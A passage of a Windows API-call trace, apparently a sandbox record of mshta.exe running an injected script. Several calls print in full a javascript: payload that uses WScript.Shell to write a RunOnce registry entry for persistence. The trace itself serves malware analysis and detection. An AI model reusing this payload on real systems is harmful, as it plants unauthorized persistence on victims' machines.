Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33f5a4 | out: phkResult=0x33f5a4*=0x248) returned 0x0 [0071.908] RegOpenKeyExW (in: hKey=0x248, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x33f560 | out: phkResult=0x33f560*=0x0) returned 0x2 [0071.908] RegOpenKeyExW (in: hKey=0x244, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x33f560 | out: phkResult=0x33f560*=0x0) returned 0x2 [0071.908] RegCloseKey (hKey=0x0) returned 0x6 [0071.908] RegCloseKey (hKey=0x0) returned 0x6 [0071.908] RegCloseKey (hKey=0x244) returned 0x0 [0071.908] RegCloseKey (hKey=0x248) returned 0x0 [0071.908] StrToIntW (lpSrc="7932560") returned 7932560 [0071.909] CoTaskMemFree (pv=0x77da40) [0071.909] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0071.909] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pdwZone=0x33f594, dwFlags=0x0 | out: pdwZone=0x33f594*=0xffffffff) returned 0x800c0011 [0071.909] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.909] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.909] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0071.909] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwAction=0x1400, pPolicy=0x33f598, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x33f598*=0x0) returned 0x0 [0071.909] IUnknown:Release (This=0x78c78c) returned 0x3 [0071.910] CoCreateInstance (in: rclsid=0x33f54c*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x33f508 | out: ppv=0x33f508*=0x2b50488) returned 0x0 [0072.921] malloc (_Size=0x80) returned 0x11d880 [0072.921] GetVersion () returned 0x1db10106 [0072.921] __dllonexit () returned 0x74a57ecf [0072.921] __dllonexit () returned 0x74a57e9b [0072.921] __dllonexit () returned 0x74a57eb5 [0072.921] __dllonexit () returned 0x74a57f70 [0072.975] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0072.976] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.976] EtwRegisterTraceGuidsA () returned 0x0 [0072.976] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.976] EtwRegisterTraceGuidsA () returned 0x0 [0072.976] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x33dec4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0072.977] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0072.977] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x33dfe8 | out: phkResult=0x33dfe8*=0x0) returned 0x2 [0073.534] GetVersion () returned 0x1db10106 [0073.534] DllGetClassObject (in: rclsid=0x792350*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e7d4 | out: ppv=0x33e7d4*=0x11fe00) returned 0x0 [0073.534] ??2@YAPAXI@Z () returned 0x11fe00 [0073.535] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x11fe00, pUnkOuter=0x0, riid=0x33f180*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x33e7c0 | out: ppvObject=0x33e7c0*=0x2b50488) returned 0x0 [0073.535] ??2@YAPAXI@Z () returned 0x2b50488 [0073.535] GetUserDefaultLCID () returned 0x409 [0073.535] GetACP () returned 0x4e4 [0073.535] JScriptEngine5:IUnknown:AddRef (This=0x2b50488) returned 0x2 [0073.535] JScriptEngine5:IUnknown:Release (This=0x2b50488) returned 0x1 [0073.535] JScriptEngine5:IUnknown:Release (This=0x11fe00) returned 0x0 [0073.535] ??3@YAXPAX@Z () returned 0x1 [0073.535] JScriptEngine5:IUnknown:QueryInterface (in: This=0x2b50488, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x33f4ac | out: ppvObject=0x33f4ac*=0x2b50488) returned 0x0 [0073.535] JScriptEngine5:IUnknown:Release (This=0x2b50488) returned 0x1 [0073.536] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0073.536] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pdwZone=0x33f41c, dwFlags=0x0 | out: pdwZone=0x33f41c*=0xffffffff) returned 0x800c0011 [0073.536] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0073.536] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0073.536] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0073.536] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwAction=0x1401, pPolicy=0x33f420, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x33f420*=0x0) returned 0x0 [0073.536] IUnknown:Release (This=0x78c78c) returned 0x3 [0073.536] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x54) returned 0x7c2e60 [0073.536] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7b90b8 [0073.536] GetCurrentThreadId () returned 0x544 [0073.536] ??2@YAPAXI@Z () returned 0x11fe00 [0073.536] GetCurrentThreadId () returned 0x544 [0073.537] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x33f348 | out: phkResult=0x33f348*=0x24c) returned 0x0 [0073.537] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0073.537] RegQueryValueExA (in: hKey=0x24c, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x33f33c, lpData=0x33f340, lpcbData=0x33f344*=0x4 | out: lpType=0x33f33c*=0x4, lpData=0x33f340*=0x1, lpcbData=0x33f344*=0x4) returned 0x0 [0073.537] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0073.537] RegCloseKey (hKey=0x24c) returned 0x0 [0073.538] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0073.538] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0073.538] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0073.538] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0073.538] CoCreateInstance (in: rclsid=0x74a423a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a423b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f344 | out: ppv=0x33f344*=0x76766460) returned 0x0 [0073.539] ??2@YAPAXI@Z () returned 0x11fe38 [0073.539] ??_U@YAPAXI@Z () returned 0x1113c0 [0073.539] ??2@YAPAXI@Z () returned 0x11fec8 [0073.539] ??2@YAPAXI@Z () returned 0x2b506a0 [0073.539] ??2@YAPAXI@Z () returned 0x11ff00 [0073.539] GetCurrentThreadId () returned 0x544 [0073.540] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x33f2e8, nSize=0x27 | out: lpBuffer="") returned 0x0 [0073.540] GetCurrentThreadId () returned 0x544 [0073.540] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0073.540] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x33f358, cchData=6 | out: lpLCData="1252") returned 5 [0073.540] IsValidCodePage (CodePage=0x4e4) returned 1 [0073.540] GetCurrentThreadId () returned 0x544 [0073.540] GetCurrentThreadId () returned 0x544 [0073.540] CoCreateInstance (in: rclsid=0x74a415ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a415fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2b50674 | out: ppv=0x2b50674*=0x7b4480) returned 0x0 [0073.541] IUnknown:AddRef (This=0x7b4480) returned 0x2 [0073.541] GetCurrentProcessId () returned 0x7bc [0073.541] GetCurrentThreadId () returned 0x544 [0073.541] GetTickCount () returned 0x1148d23 [0073.541] ISystemDebugEventFire:BeginSession (This=0x7b4480, guidSourceID=0x74a416d4, strSessionName="JScript:00001980:00001348:18124067") returned 0x0 [0073.541] GetCurrentThreadId () returned 0x544 [0073.541] GetCurrentThreadId () returned 0x544 [0073.541] ??2@YAPAXI@Z () returned 0x11ff68 [0073.542] GetCurrentThreadId () returned 0x544 [0073.542] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0073.542] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x7c3ba0 [0073.542] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f2b4 | out: ppv=0x33f2b4*=0x787518) returned 0x0 [0073.542] ??2@YAPAXI@Z () returned 0x11ffa0 [0073.542] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76766460, pUnk=0x11ffa0, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x11ffbc | out: pdwCookie=0x11ffbc*=0x100) returned 0x0 [0073.542] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x11ffa0, riid=0x766597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33f238 | out: ppvObject=0x33f238*=0x0) returned 0x80004002 [0073.542] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x11ffa0, riid=0x76663e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33f228 | out: ppvObject=0x33f228*=0x0) returned 0x80004002 [0073.542] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x11ffa0) returned 0x2 [0073.543] IUnknown:AddRef (This=0x787518) returned 0x2 [0073.543] IUnknown:Release (This=0x787518) returned 0x1 [0073.543] ??2@YAPAXI@Z () returned 0x2b50998 [0073.543] GetTickCount () returned 0x1148d23 [0073.543] ??2@YAPAXI@Z () returned 0x2b50fe8 [0073.543] malloc (_Size=0x40) returned 0x2b51058 [0073.543] malloc (_Size=0x104) returned 0x2b510a0 [0073.543] ??2@YAPAXI@Z () returned 0x11ffc8 [0073.543] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f2d0 | out: ppv=0x33f2d0*=0x787518) returned 0x0 [0073.543] IUnknown:Release (This=0x787518) returned 0x1 [0073.543] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f2d0 | out: ppv=0x33f2d0*=0x787518) returned 0x0 [0073.543] IUnknown:Release (This=0x787518) returned 0x1 [0073.544] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7b90d0 [0073.544] GetCurrentThreadId () returned 0x544 [0073.544] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x7b90e8 [0073.544] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4c50 [0073.544] GetCurrentThreadId () returned 0x544 [0073.544] realloc (_Block=0x0, _Size=0xc8) returned 0x2b511b0 [0073.545] ??2@YAPAXI@Z () returned 0x2b51280 [0073.545] malloc (_Size=0x804) returned 0x2b512a8 [0073.545] ??2@YAPAXI@Z () returned 0x2b51ab8 [0073.545] malloc (_Size=0x104) returned 0x2b51c20 [0073.546] malloc (_Size=0x204) returned 0x2b51d30 [0073.547] malloc (_Size=0x404) returned 0x2b51f40 [0073.547] ??3@YAXPAX@Z () returned 0x1 [0073.547] malloc (_Size=0x40) returned 0x2b51ab8 [0073.547] malloc (_Size=0x804) returned 0x2b52350 [0073.548] realloc (_Block=0x2b51ab8, _Size=0x60) returned 0x2b51ab8 [0073.548] malloc (_Size=0x5b8) returned 0x2b52b60 [0073.549] ??2@YAPAXI@Z () returned 0x1113d0 [0073.549] free (_Block=0x2b512a8) [0073.549] ??3@YAXPAX@Z () returned 0x1 [0073.549] free (_Block=0x2b51ab8) [0073.549] free (_Block=0x2b52350) [0073.549] free (_Block=0x2b51f40) [0073.549] free (_Block=0x2b51d30) [0073.549] free (_Block=0x2b51c20) [0073.549] ??2@YAPAXI@Z () returned 0x2b53120 [0073.549] ??2@YAPAXI@Z () returned 0x2b53158 [0073.549] malloc (_Size=0xc) returned 0x2b53178 [0073.550] ??2@YAPAXI@Z () returned 0x2b53190 [0073.550] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3f0 | out: ppv=0x33f3f0*=0x787518) returned 0x0 [0073.550] IUnknown:Release (This=0x787518) returned 0x1 [0073.550] ??2@YAPAXI@Z () returned 0x2b531d8 [0073.550] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f440 | out: ppv=0x33f440*=0x787518) returned 0x0 [0073.550] IUnknown:Release (This=0x787518) returned 0x1 [0073.550] ??2@YAPAXI@Z () returned 0x2b53248 [0073.551] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0073.551] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f43c | out: ppv=0x33f43c*=0x787518) returned 0x0 [0073.551] IUnknown:Release (This=0x787518) returned 0x1 [0073.552] malloc (_Size=0x658) returned 0x2b532c8 [0073.552] GetCurrentThreadId () returned 0x544 [0073.552] GetCurrentThreadId () returned 0x544 [0073.553] GetCurrentThreadId () returned 0x544 [0073.553] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x24) returned 0x7a9198 [0073.554] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.554] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.600] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30) returned 0x77da40 [0073.627] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30c) returned 0x7c5e78 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3bc0 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3be0 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c00 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c20 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c40 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c60 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3c80 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3ca0 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3cc0 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3ce0 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3d00 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7c3d20 [0073.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x7b9100 [0073.633] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.633] IsCharSpaceW (wch=0x6f) returned 0 [0073.633] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.633] IsCharSpaceW (wch=0x6f) returned 0 [0073.633] ??2@YAPAXI@Z () returned 0x2b53928 [0073.634] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0073.634] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgIDEx") returned 0x76630782 [0073.634] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x33f004 | out: lpclsid=0x33f004*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0073.636] SysStringLen (param_1=0x0) returned 0x0 [0073.636] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0073.636] CoGetClassObject (in: rclsid=0x33f004*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33eff8 | out: ppv=0x33eff8*=0x2b53998) returned 0x0 [0074.304] malloc (_Size=0x80) returned 0x11d990 [0074.304] GetVersionExA (in: lpVersionInformation=0x33dbe4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77c6e026, dwPlatformId=0x76f9f761, szCSDVersion="\x9cÜ3") | out: lpVersionInformation=0x33dbe4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.304] GetUserDefaultLCID () returned 0x409 [0074.305] DllGetClassObject (in: rclsid=0x792384*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x33ecb0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e368 | out: ppv=0x33e368*=0x2b53998) returned 0x0 [0074.305] ??2@YAPAXI@Z () returned 0x2b53998 [0074.305] WshShell:IUnknown:AddRef (This=0x2b53998) returned 0x2 [0074.305] WshShell:IUnknown:Release (This=0x2b53998) returned 0x1 [0074.305] WshShell:IUnknown:QueryInterface (in: This=0x2b53998, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef24 | out: ppvObject=0x33ef24*=0x2b53998) returned 0x0 [0074.305] WshShell:IUnknown:Release (This=0x2b53998) returned 0x1 [0074.305] ??2@YAPAXI@Z () returned 0x2b539b0 [0074.305] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x33ee80, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0074.305] lstrlenA (lpString="\\wscript.exe") returned 12 [0074.306] lstrlenA (lpString="C:\\Windows\\SysWOW64\\mshta.exe") returned 29 [0074.306] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\wscript.exe") returned -1 [0074.306] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\cscript.exe") returned -1 [0074.306] ??3@YAXPAX@Z () returned 0x1 [0074.306] GetCurrentThreadId () returned 0x544 [0074.306] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.307] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.307] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.307] IsCharSpaceW (wch=0x78) returned 0 [0074.307] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.307] IsCharSpaceW (wch=0x78) returned 0 [0074.307] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x33f004 | out: lpclsid=0x33f004*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0074.309] SysStringLen (param_1=0x0) returned 0x0 [0074.309] CoGetClassObject (in: rclsid=0x33f004*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33eff8 | out: ppv=0x33eff8*=0x2b539e0) returned 0x0 [0074.315] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b539e0, riid=0x74a47884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x33eff4 | out: ppvObject=0x33eff4*=0x0) returned 0x80004002 [0074.315] FileSystemObject:IClassFactory:CreateInstance (in: This=0x2b539e0, pUnkOuter=0x0, riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33effc | out: ppvObject=0x33effc*=0x2b53a00) returned 0x0 [0074.316] FileSystemObject:IUnknown:Release (This=0x2b539e0) returned 0x0 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x33efb0 | out: ppvObject=0x33efb0*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef9c | out: ppvObject=0x33ef9c*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef98 | out: ppvObject=0x33ef98*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef94 | out: ppvObject=0x33ef94*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef90 | out: ppvObject=0x33ef90*=0x0) returned 0x80004002 [0074.316] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53a00, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef8c | out: ppvObject=0x33ef8c*=0x2b53a00) returned 0x0 [0074.316] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0074.316] GetCurrentThreadId () returned 0x544 [0074.317] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.317] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.317] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, 